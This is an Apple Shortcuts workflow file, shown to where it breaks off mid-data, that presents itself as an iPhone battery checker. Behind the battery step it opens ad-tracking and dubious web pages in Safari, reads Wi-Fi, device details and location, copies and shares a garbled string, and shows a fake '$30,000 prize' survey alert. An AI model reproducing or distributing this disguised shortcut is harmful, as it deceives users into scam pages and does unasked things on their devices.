<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>WFWorkflowActions</key>
	<array>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.gettext</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>UUID</key>
				<string>A29DABD5-0076-4215-BA74-4C7508764B75</string>
				<key>WFTextActionText</key>
				<string>Checking your iPhone battery status. Please wait!</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.speaktext</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>WFSpeakTextVoice</key>
				<string>com.apple.ttsbundle.siri_male_en-US_compact</string>
				<key>WFText</key>
				<dict>
					<key>Value</key>
					<dict>
						<key>attachmentsByRange</key>
						<dict>
							<key>{0, 1}</key>
							<dict>
								<key>OutputName</key>
								<string>Text</string>
								<key>OutputUUID</key>
								<string>A29DABD5-0076-4215-BA74-4C7508764B75</string>
								<key>Type</key>
								<string>ActionOutput</string>
							</dict>
						</dict>
						<key>string</key>
						<string>￼</string>
					</dict>
					<key>WFSerializationType</key>
					<string>WFTextTokenString</string>
				</dict>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.delay</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>WFDelayTime</key>
				<real>6</real>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.getbatterylevel</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>UUID</key>
				<string>A15FB9B7-9EDC-425B-9830-13C92427CE97</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.conditional</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>GroupingIdentifier</key>
				<string>FFAF697F-745D-4F58-B599-632EE738DEE2</string>
				<key>WFCondition</key>
				<integer>0</integer>
				<key>WFControlFlowMode</key>
				<integer>0</integer>
				<key>WFInput</key>
				<dict>
					<key>Type</key>
					<string>Variable</string>
					<key>Variable</key>
					<dict>
						<key>Value</key>
						<dict>
							<key>OutputName</key>
							<string>Battery Level</string>
							<key>OutputUUID</key>
							<string>A15FB9B7-9EDC-425B-9830-13C92427CE97</string>
							<key>Type</key>
							<string>ActionOutput</string>
						</dict>
						<key>WFSerializationType</key>
						<string>WFTextTokenAttachment</string>
					</dict>
				</dict>
				<key>WFNumberValue</key>
				<string>19</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.lowpowermode.set</string>
			<key>WFWorkflowActionParameters</key>
			<dict/>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.gettext</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>UUID</key>
				<string>EB0D62DC-C98D-42FD-A588-720E1963D1C2</string>
				<key>WFTextActionText</key>
				<string>To reserve Battery, low power mode has been enabled.</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.speaktext</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>WFText</key>
				<dict>
					<key>Value</key>
					<dict>
						<key>attachmentsByRange</key>
						<dict>
							<key>{0, 1}</key>
							<dict>
								<key>OutputName</key>
								<string>Text</string>
								<key>OutputUUID</key>
								<string>EB0D62DC-C98D-42FD-A588-720E1963D1C2</string>
								<key>Type</key>
								<string>ActionOutput</string>
							</dict>
						</dict>
						<key>string</key>
						<string>￼</string>
					</dict>
					<key>WFSerializationType</key>
					<string>WFTextTokenString</string>
				</dict>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.conditional</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>GroupingIdentifier</key>
				<string>FFAF697F-745D-4F58-B599-632EE738DEE2</string>
				<key>WFControlFlowMode</key>
				<integer>1</integer>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.conditional</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>GroupingIdentifier</key>
				<string>FFAF697F-745D-4F58-B599-632EE738DEE2</string>
				<key>UUID</key>
				<string>A30753CA-C5FE-4856-A05C-88B4005C3BB0</string>
				<key>WFControlFlowMode</key>
				<integer>2</integer>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.gettext</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>UUID</key>
				<string>27256573-502D-433C-9859-D0D41DB5A706</string>
				<key>WFTextActionText</key>
				<dict>
					<key>Value</key>
					<dict>
						<key>attachmentsByRange</key>
						<dict>
							<key>{18, 1}</key>
							<dict>
								<key>OutputName</key>
								<string>Battery Level</string>
								<key>OutputUUID</key>
								<string>A15FB9B7-9EDC-425B-9830-13C92427CE97</string>
								<key>Type</key>
								<string>ActionOutput</string>
							</dict>
						</dict>
						<key>string</key>
						<string>Your iPhone is at ￼</string>
					</dict>
					<key>WFSerializationType</key>
					<string>WFTextTokenString</string>
				</dict>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.speaktext</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>WFSpeakTextVoice</key>
				<string>com.apple.ttsbundle.siri_male_en-US_compact</string>
				<key>WFText</key>
				<dict>
					<key>Value</key>
					<dict>
						<key>attachmentsByRange</key>
						<dict>
							<key>{0, 1}</key>
							<dict>
								<key>OutputName</key>
								<string>Text</string>
								<key>OutputUUID</key>
								<string>27256573-502D-433C-9859-D0D41DB5A706</string>
								<key>Type</key>
								<string>ActionOutput</string>
							</dict>
						</dict>
						<key>string</key>
						<string>￼</string>
					</dict>
					<key>WFSerializationType</key>
					<string>WFTextTokenString</string>
				</dict>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.gettext</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>UUID</key>
				<string>A3896914-B439-4959-BE0F-70BA4BEBE282</string>
				<key>WFTextActionText</key>
				<string>ThrurjfheurjfjrutztsibdhdHrajrajrAjrjfjrjiIP 16, 610331- 16,000 shit!</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.share</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>WFInput</key>
				<dict>
					<key>Value</key>
					<dict>
						<key>OutputName</key>
						<string>Text</string>
						<key>OutputUUID</key>
						<string>A3896914-B439-4959-BE0F-70BA4BEBE282</string>
						<key>Type</key>
						<string>ActionOutput</string>
					</dict>
					<key>WFSerializationType</key>
					<string>WFTextTokenAttachment</string>
				</dict>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.comment</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>WFCommentActionText</key>
				<string>ThrurjfheurjfjrutztsibdhdHrajrajrAjrjfjrjiIP 16, 610331- 16,000 shit!</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.number.random</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>UUID</key>
				<string>2A01822D-57AA-4CF8-9C38-64E46CE28B80</string>
				<key>WFRandomNumberMaximum</key>
				<string>6656560</string>
				<key>WFRandomNumberMinimum</key>
				<string>1</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.repeat.count</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>GroupingIdentifier</key>
				<string>D18F1124-63AA-44FC-A915-48A938D3935D</string>
				<key>WFControlFlowMode</key>
				<integer>0</integer>
				<key>WFRepeatCount</key>
				<real>412</real>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.repeat.count</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>GroupingIdentifier</key>
				<string>D18F1124-63AA-44FC-A915-48A938D3935D</string>
				<key>UUID</key>
				<string>217644F0-DBEF-4B68-B9EF-AD3E25DDB883</string>
				<key>WFControlFlowMode</key>
				<integer>2</integer>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.file.createfolder</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>WFFilePath</key>
				<dict>
					<key>Value</key>
					<dict>
						<key>attachmentsByRange</key>
						<dict>
							<key>{0, 1}</key>
							<dict>
								<key>OutputName</key>
								<string>Random Number</string>
								<key>OutputUUID</key>
								<string>2A01822D-57AA-4CF8-9C38-64E46CE28B80</string>
								<key>Type</key>
								<string>ActionOutput</string>
							</dict>
						</dict>
						<key>string</key>
						<string>￼</string>
					</dict>
					<key>WFSerializationType</key>
					<string>WFTextTokenString</string>
				</dict>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.setclipboard</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>WFInput</key>
				<dict>
					<key>Value</key>
					<dict>
						<key>OutputName</key>
						<string>Text</string>
						<key>OutputUUID</key>
						<string>A3896914-B439-4959-BE0F-70BA4BEBE282</string>
						<key>Type</key>
						<string>ActionOutput</string>
					</dict>
					<key>WFSerializationType</key>
					<string>WFTextTokenAttachment</string>
				</dict>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.speaktext</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>WFText</key>
				<dict>
					<key>Value</key>
					<dict>
						<key>attachmentsByRange</key>
						<dict>
							<key>{0, 1}</key>
							<dict>
								<key>OutputName</key>
								<string>Text</string>
								<key>OutputUUID</key>
								<string>A3896914-B439-4959-BE0F-70BA4BEBE282</string>
								<key>Type</key>
								<string>ActionOutput</string>
							</dict>
						</dict>
						<key>string</key>
						<string>￼</string>
					</dict>
					<key>WFSerializationType</key>
					<string>WFTextTokenString</string>
				</dict>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.useractivity.open</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>AppBundleIdentifier</key>
				<string>com.apple.mobilesafari</string>
				<key>UserActivityData</key>
				<data>
				YnBsaXN0MDDUAQIDBAUGBwpYJHZlcnNpb25ZJGFyY2hp
				dmVyVCR0b3BYJG9iamVjdHMSAAGGoF8QD05TS2V5ZWRB
				cmNoaXZlctEICVRyb290gAGvEBQLDElPVVZcXWBhZWhs
				cXd4eXx/glUkbnVsbN8QHg0ODxAREhMUFRYXGBkaGxwd
				Hh8gISIjJCUmJygpKissLS4uMDEyLi4uLi44OToxLj0y
				MS4uQi4uRS5HMVxyZXF1aXJlZEtleXNVdGl0bGVad2Vi
				cGFnZVVSTF8QE2R5bmFtaWNBY3Rpdml0eVR5cGVfEBRw
				ZXJzaXN0ZW50SWRlbnRpZmllcldvcHRpb25zXxAZZWxp
				Z2libGVGb3JQdWJsaWNJbmRleGluZ18QFWVsaWdpYmxl
				Rm9yUHJlZGljdGlvbl8QEGJ1bmRsZUlkZW50aWZpZXJe
				ZXhwaXJhdGlvbkRhdGVccGF5bG9hZEVycm9yVHV1aWRY
				a2V5d29yZHNcYWN0aXZpdHlUeXBlXxAXY29udGVudEF0
				dHJpYnV0ZVNldERhdGFXdmVyc2lvblhpc0FjdGl2ZV50
				ZWFtSWRlbnRpZmllclR0eXBlXxASZWxpZ2libGVGb3JI
				YW5kb2ZmXxAUZWxpZ2libGVGb3JSZW1pbmRlcnNbcmVm
				ZXJyZXJVUkxfEBd0YXJnZXRDb250ZW50SWRlbnRpZmll
				clYkY2xhc3NecGVlckRldmljZVR5cGVacGVlckRldmlj
				ZVR3aGVuXWNvbnRlbnRBY3Rpb25YcGF5bG9hZHNfEBFl
				bGlnaWJsZUZvclNlYXJjaIARgASABYAAgACAAggJgACA
				AIAAgACAAIAIgAsQAQiAABABCQiAAIAAgBOAAIAAgAmA
				AIANCNNKSyRMTU5XTlMua2V5c1pOUy5vYmplY3RzoKCA
				A9JQUVJTWiRjbGFzc25hbWVYJGNsYXNzZXNcTlNEaWN0
				aW9uYXJ5olJUWE5TT2JqZWN0XxDRaHR0cHM6Ly91cy1u
				b3RpZnkuYmlkYWdlbnQueGFkLmNvbS9sYW5kaW5ncGFn
				ZT9yaWQ9OTJhM2QxYzEtOTNhMC00YzE4LTk2ZWMtMDZj
				MGQ2NjdjNmU0JnNwaWQ9MjQwJnRzPTE1NjQyNzk0NjM2
				MjQmZHBpZD0wJmhvc3Q9ZWMyLTMtODMtMzgtMTczLmNv
				bXB1dGUtMS5hbWF6b25hd3MuY29tJmNhbXBhaWduSWQ9
				MjA4NDY2JmFkZ3JvdXBJZD0yNDUxNTg0JnQ9Y2xpY2vT
				VyRYLlpbV05TLmJhc2VbTlMucmVsYXRpdmWAAIAHgAZf
				ENFodHRwczovL3VzLW5vdGlmeS5iaWRhZ2VudC54YWQu
				Y29tL2xhbmRpbmdwYWdlP3JpZD05MmEzZDFjMS05M2Ew
				LTRjMTgtOTZlYy0wNmMwZDY2N2M2ZTQmc3BpZD0yNDAm
				dHM9MTU2NDI3OTQ2MzYyNCZkcGlkPTAmaG9zdD1lYzIt
				My04My0zOC0xNzMuY29tcHV0ZS0xLmFtYXpvbmF3cy5j
				b20mY2FtcGFpZ25JZD0yMDg0NjYmYWRncm91cElkPTI0
				NTE1ODQmdD1jbGlja9JQUV5fVU5TVVJMol5UXxAdTlNV
				c2VyQWN0aXZpdHlUeXBlQnJvd3NpbmdXZWLSYiRjZFdO
				Uy50aW1lI0HBdqDckuv/gArSUFFmZ1ZOU0RhdGWiZlTS
				aSRqa1dOUy5kYXRhTxED+2JwbGlzdDAw1AECAwQFBgcK
				WCR2ZXJzaW9uWSRhcmNoaXZlclQkdG9wWCRvYmplY3Rz
				EgABhqBfEA9OU0tleWVkQXJjaGl2ZXLRCAlUcm9vdIAB
				pAsMERJVJG51bGzSDQ4PEFljb250YWluZXJWJGNsYXNz
				gAKAA08RAsreugABAADKAgAAVQIAAB0AAADwVQIAAAAA
				VQIAADQCAAADACkCAAAlAAAAX19jbGFzczpDU1NlYXJj
				aGFibGVJdGVtQXR0cmlidXRlU2V0APIBAAAFALkBAAAH
				AA8AAABwdWJsaWMuY29udGVudACWAQAA//4OIHUAcwAt
				AG4AbwB0AGkAZgB5AC4AYgBpAGQAYQBnAGUAbgB0AC4A
				eABhAGQALgBjAG8AbQAvAGwAYQBuAGQAaQBuAGcAcABh
				AGcAZQA/AHIAaQBkAD0AOQAyAGEAMwBkADEAYwAxAC0A
				OQAzAGEAMAAtADQAYwAxADgALQA5ADYAZQBjAC0AMAA2
				AGMAMABkADYANgA3AGMANgBlADQAJgBzAHAAaQBkAD0A
				MgA0ADAAJgB0AHMAPQAxADUANgA0ADIANwA5ADQANgAz
				ADYAMgA0ACYAZABwAGkAZAA9ADAAJgBoAG8AcwB0AD0A
				ZQBjADIALQAzAC0AOAAzAC0AMwA4AC0AMQA3ADMALgBj
				AG8AbQBwAHUAdABlAC0AMQAuAGEAbQBhAHoAbwBuAGEA
				dwBzAC4AYwBvAG0AJgBjAGEAbQBwAGEAaQBnAG4ASQBk
				AD0AMgAwADgANAA2ADYAJgBhAGQAZwByAG8AdQBwAEkA
				ZAA9ADIANAA1ADEANQA4ADQAJgB0AD0AYwBsAGkAYwBr
				AAAAAAABAAMAAwADAAMABQAWAAAAXAAAAPRUAAAAAAAA
				AOA/AAAAbwAAAPUrAAAAAAAAAOAAAAAAAAAAAOAnAAAA
				9AAAAADiUAAAAPETAGtNREl0ZW1UaHVtYm5haWxVUkwA
				EgBrTURJdGVtQ29udGVudFR5cGUAEQBrTURJdGVtQ29u
				dGVudFVSTAASAGtNREl0ZW1EZXNjcmlwdGlvbgAeAGtN
				REl0ZW1SZWxhdGVkVW5pcXVlSWRlbnRpZmllcgDSExQV
				FlokY2xhc3NuYW1lWCRjbGFzc2VzXxAcQ1NTZWFyY2hh
				YmxlSXRlbUF0dHJpYnV0ZVNldKIXGF8QHENTU2VhcmNo
				YWJsZUl0ZW1BdHRyaWJ1dGVTZXRYTlNPYmplY3QACAAR
				ABoAJAApADIANwBJAEwAUQBTAFgAXgBjAG0AdAB2AHgD
				RgNLA1YDXwN+A4EDoAAAAAAAAAIBAAAAAAAAABkAAAAA
				AAAAAAAAAAAAAAOpgAzSUFFtbl1OU011dGFibGVEYXRh
				o29wVF1OU011dGFibGVEYXRhVk5TRGF0YdNKSyRydHah
				c4AOoXWAD4AQXxAaVUFJbnRlbnRzSWRlbnRpZmllclBh
				eWxvYWRPELBicGxpc3QwMNQBAgMEBQYHClgkdmVyc2lv
				blkkYXJjaGl2ZXJUJHRvcFgkb2JqZWN0cxIAAYagXxAP
				TlNLZXllZEFyY2hpdmVy0QgJVHJvb3SAAaILDFUkbnVs
				bF8QJEUyODFCM0NFLTYyN0MtNDAwNy1CNzE1LUE3RkI3
				QjFCNjFBNggRGiQpMjdJTFFTVlwAAAAAAAABAQAAAAAA
				AAANAAAAAAAAAAAAAAAAAAAAg9JQUXp7XxATTlNNdXRh
				YmxlRGljdGlvbmFyeaN6UlTSSyR9fqCAEtJQUYCBVU5T
				U2V0ooBU0lBRg4RfEBJVQVVzZXJBY3Rpdml0eUluZm+i
				hVRfEBJVQVVzZXJBY3Rpdml0eUluZm8ACAARABoAJAAp
				ADIANwBJAEwAUQBTAGoAcACvALwAwgDNAOMA+gECAR4B
				NgFJAVgBZQFqAXMBgAGaAaIBqwG6Ab8B1AHrAfcCEQIY
				AicCMgI3AkUCTgJiAmQCZgJoAmoCbAJuAm8CcAJyAnQC
				dgJ4AnoCfAJ+AoACgQKDAoUChgKHAokCiwKNAo8CkQKT
				ApUClwKYAp8CpwKyArMCtAK2ArsCxgLPAtwC3wLoA7wD
				wwPLA9cD2QPbA90EsQS2BLwEvwTfBOQE7AT1BPcE/AUD
				BQYFCwUTCRIJFAkZCScJKwk5CUAJRwlJCUsJTQlPCVEJ
				bgohCiYKPApACkUKRgpICk0KUwpWClsKcApzAAAAAAAA
				AgEAAAAAAAAAhgAAAAAAAAAAAAAAAAAACog=
				</data>
				<key>UserActivitySubtitle</key>
				<string>‎us-notify.bidagent.xad.com/landingpage?rid=92a3d1c1-93a0-4c18-96ec-06c0d667c6e4&amp;spid=240&amp;ts=1564279463624&amp;dpid=0&amp;host=ec2-3-83-38-173.compute-1.amazonaws.com&amp;campaignId=208466&amp;adgroupId=2451584&amp;t=click</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.getwifi</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>UUID</key>
				<string>3BD4F928-3662-481B-88A2-987DF076407E</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.speaktext</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>WFText</key>
				<dict>
					<key>Value</key>
					<dict>
						<key>attachmentsByRange</key>
						<dict>
							<key>{0, 1}</key>
							<dict>
								<key>OutputName</key>
								<string>Network Details</string>
								<key>OutputUUID</key>
								<string>3BD4F928-3662-481B-88A2-987DF076407E</string>
								<key>Type</key>
								<string>ActionOutput</string>
							</dict>
						</dict>
						<key>string</key>
						<string>￼</string>
					</dict>
					<key>WFSerializationType</key>
					<string>WFTextTokenString</string>
				</dict>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.flashlight</string>
			<key>WFWorkflowActionParameters</key>
			<dict/>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.vibrate</string>
			<key>WFWorkflowActionParameters</key>
			<dict/>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.getdevicedetails</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>UUID</key>
				<string>8C0AF133-8E12-4764-B03C-6A9DC61F8A28</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.useractivity.open</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>AppBundleIdentifier</key>
				<string>com.apple.mobilesafari</string>
				<key>UserActivityData</key>
				<data>
				YnBsaXN0MDDUAQIDBAUGBwpYJHZlcnNpb25ZJGFyY2hp
				dmVyVCR0b3BYJG9iamVjdHMSAAGGoF8QD05TS2V5ZWRB
				cmNoaXZlctEICVRyb290gAGvEBQLDElPVVZcXWBhZWhs
				cXd4eXx/glUkbnVsbN8QHg0ODxAREhMUFRYXGBkaGxwd
				Hh8gISIjJCUmJygpKissLS4uMDEyLi4uLi44OToxLj0y
				MS4uQi4uRS5HMVxyZXF1aXJlZEtleXNVdGl0bGVad2Vi
				cGFnZVVSTF8QE2R5bmFtaWNBY3Rpdml0eVR5cGVfEBRw
				ZXJzaXN0ZW50SWRlbnRpZmllcldvcHRpb25zXxAZZWxp
				Z2libGVGb3JQdWJsaWNJbmRleGluZ18QFWVsaWdpYmxl
				Rm9yUHJlZGljdGlvbl8QEGJ1bmRsZUlkZW50aWZpZXJe
				ZXhwaXJhdGlvbkRhdGVccGF5bG9hZEVycm9yVHV1aWRY
				a2V5d29yZHNcYWN0aXZpdHlUeXBlXxAXY29udGVudEF0
				dHJpYnV0ZVNldERhdGFXdmVyc2lvblhpc0FjdGl2ZV50
				ZWFtSWRlbnRpZmllclR0eXBlXxASZWxpZ2libGVGb3JI
				YW5kb2ZmXxAUZWxpZ2libGVGb3JSZW1pbmRlcnNbcmVm
				ZXJyZXJVUkxfEBd0YXJnZXRDb250ZW50SWRlbnRpZmll
				clYkY2xhc3NecGVlckRldmljZVR5cGVacGVlckRldmlj
				ZVR3aGVuXWNvbnRlbnRBY3Rpb25YcGF5bG9hZHNfEBFl
				bGlnaWJsZUZvclNlYXJjaIARgASABYAAgACAAggJgACA
				AIAAgACAAIAIgAsQAQiAABABCQiAAIAAgBOAAIAAgAmA
				AIANCNNKSyRMTU5XTlMua2V5c1pOUy5vYmplY3RzoKCA
				A9JQUVJTWiRjbGFzc25hbWVYJGNsYXNzZXNcTlNEaWN0
				aW9uYXJ5olJUWE5TT2JqZWN0bxAsAG0AcAAzADIAdQAu
				AG4AZQB0AKAALQCgAG0AcAAzADIAdQAgAFIAZQBzAG8A
				dQByAGMAZQBzACAAYQBuAGQAIABJAG4AZgBvAHIAbQBh
				AHQAaQBvAG4ALtNXJFguWltXTlMuYmFzZVtOUy5yZWxh
				dGl2ZYAAgAeABl8QFWh0dHA6Ly93dzEubXAzMnUubmV0
				L9JQUV5fVU5TVVJMol5UXxAdTlNVc2VyQWN0aXZpdHlU
				eXBlQnJvd3NpbmdXZWLSYiRjZFdOUy50aW1lI0HB9uH2
				9WP+gArSUFFmZ1ZOU0RhdGWiZlTSaSRqa1dOUy5kYXRh
				TxECp2JwbGlzdDAw1AECAwQFBgcKWCR2ZXJzaW9uWSRh
				cmNoaXZlclQkdG9wWCRvYmplY3RzEgABhqBfEA9OU0tl
				eWVkQXJjaGl2ZXLRCAlUcm9vdIABpAsMERJVJG51bGzS
				DQ4PEFljb250YWluZXJWJGNsYXNzgAKAA08RAXbeugAB
				AAB2AQAA6gAAAB0AAADw6gAAAAAA6gAAAMkAAAADAL4A
				AAAlAAAAX19jbGFzczpDU1NlYXJjaGFibGVJdGVtQXR0
				cmlidXRlU2V0AIcAAAAGAEEAAAAJAA8AAABwdWJsaWMu
				Y29udGVudAAeAAAA//4OIHcAdwAxAC4AbQBwADMAMgB1
				AC4AbgBlAHQAAAAAAAEAAgADAAQABAAEAAYABgBrAAAA
				AAAAAOAAAAAAAAAAAOBUAAAAAAAAAOAWAAAAXAAAAPQ/
				AAAAbwAAAPUrAAAAAAAAAOAnAAAA9AAAAADiUAAAAPET
				AGtNREl0ZW1UaHVtYm5haWxVUkwAEgBrTURJdGVtQ29u
				dGVudFR5cGUAEQBrTURJdGVtQ29udGVudFVSTAASAGtN
				REl0ZW1EZXNjcmlwdGlvbgAUAGtNREl0ZW1UaHVtYm5h
				aWxEYXRhAB4Aa01ESXRlbVJlbGF0ZWRVbmlxdWVJZGVu
				dGlmaWVyANITFBUWWiRjbGFzc25hbWVYJGNsYXNzZXNf
				EBxDU1NlYXJjaGFibGVJdGVtQXR0cmlidXRlU2V0ohcY
				XxAcQ1NTZWFyY2hhYmxlSXRlbUF0dHJpYnV0ZVNldFhO
				U09iamVjdAAIABEAGgAkACkAMgA3AEkATABRAFMAWABe
				AGMAbQB0AHYAeAHyAfcCAgILAioCLQJMAAAAAAAAAgEA
				AAAAAAAAGQAAAAAAAAAAAAAAAAAAAlWADNJQUW1uXU5T
				TXV0YWJsZURhdGGjb3BUXU5TTXV0YWJsZURhdGFWTlNE
				YXRh00pLJHJ0dqFzgA6hdYAPgBBfEBpVQUludGVudHNJ
				ZGVudGlmaWVyUGF5bG9hZE8QsGJwbGlzdDAw1AECAwQF
				BgcKWCR2ZXJzaW9uWSRhcmNoaXZlclQkdG9wWCRvYmpl
				Y3RzEgABhqBfEA9OU0tleWVkQXJjaGl2ZXLRCAlUcm9v
				dIABogsMVSRudWxsXxAkQzY1OEIzRjMtRDFEMy00QUQ3
				LUFBRUYtMjBDMEJENjE2RDY5CBEaJCkyN0lMUVNWXAAA
				AAAAAAEBAAAAAAAAAA0AAAAAAAAAAAAAAAAAAACD0lBR
				entfEBNOU011dGFibGVEaWN0aW9uYXJ5o3pSVNJLJH1+
				oIAS0lBRgIFVTlNTZXSigFTSUFGDhF8QElVBVXNlckFj
				dGl2aXR5SW5mb6KFVF8QElVBVXNlckFjdGl2aXR5SW5m
				bwAIABEAGgAkACkAMgA3AEkATABRAFMAagBwAK8AvADC
				AM0A4wD6AQIBHgE2AUkBWAFlAWoBcwGAAZoBogGrAboB
				vwHUAesB9wIRAhgCJwIyAjcCRQJOAmICZAJmAmgCagJs
				Am4CbwJwAnICdAJ2AngCegJ8An4CgAKBAoMChQKGAocC
				iQKLAo0CjwKRApMClQKXApgCnwKnArICswK0ArYCuwLG
				As8C3ALfAugDQwNKA1IDXgNgA2IDZAN8A4EDhwOKA6oD
				rwO3A8ADwgPHA84D0QPWA94GiQaLBpAGngaiBrAGtwa+
				BsAGwgbEBsYGyAblB5gHnQezB7cHvAe9B78HxAfKB80H
				0gfnB+oAAAAAAAACAQAAAAAAAACGAAAAAAAAAAAAAAAA
				AAAH/w==
				</data>
				<key>UserActivitySubtitle</key>
				<string>‎ww1.mp32u.net</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.vibrate</string>
			<key>WFWorkflowActionParameters</key>
			<dict/>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.vibrate</string>
			<key>WFWorkflowActionParameters</key>
			<dict/>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.properties.safariwebpage</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>WFInput</key>
				<dict>
					<key>Value</key>
					<dict>
						<key>OutputName</key>
						<string>Type</string>
						<key>OutputUUID</key>
						<string>120272C9-5992-470E-94AF-D85C72C32454</string>
						<key>Type</key>
						<string>ActionOutput</string>
					</dict>
					<key>WFSerializationType</key>
					<string>WFTextTokenAttachment</string>
				</dict>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.delay</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>WFDelayTime</key>
				<real>13</real>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.alert</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>WFAlertActionMessage</key>
				<string>Congratulations! You just wun  $30,000! Click OK to start your survey! Don't wait, click OK to begin!</string>
				<key>WFAlertActionTitle</key>
				<string>Congratulations Apple user</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.getcurrentlocation</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>UUID</key>
				<string>38A0BA89-FBA0-44C1-A049-F256B00B46F5</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.useractivity.open</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>AppBundleIdentifier</key>
				<string>com.apple.mobilesafari</string>
				<key>UserActivityData</key>
				<data>
				YnBsaXN0MDDUAQIDBAUGBwpYJHZlcnNpb25ZJGFyY2hp
				dmVyVCR0b3BYJG9iamVjdHMSAAGGoF8QD05TS2V5ZWRB
				cmNoaXZlctEICVRyb290gAGvEBQLDElPVVZcXWBhZWhs
				cXd4eXx/glUkbnVsbN8QHg0ODxAREhMUFRYXGBkaGxwd
				Hh8gISIjJCUmJygpKissLS4uMDEyLi4uLi44OToxLj0y
				MS4uQi4uRS5HMVxyZXF1aXJlZEtleXNVdGl0bGVad2Vi
				cGFnZVVSTF8QE2R5bmFtaWNBY3Rpdml0eVR5cGVfEBRw
				ZXJzaXN0ZW50SWRlbnRpZmllcldvcHRpb25zXxAZZWxp
				Z2libGVGb3JQdWJsaWNJbmRleGluZ18QFWVsaWdpYmxl
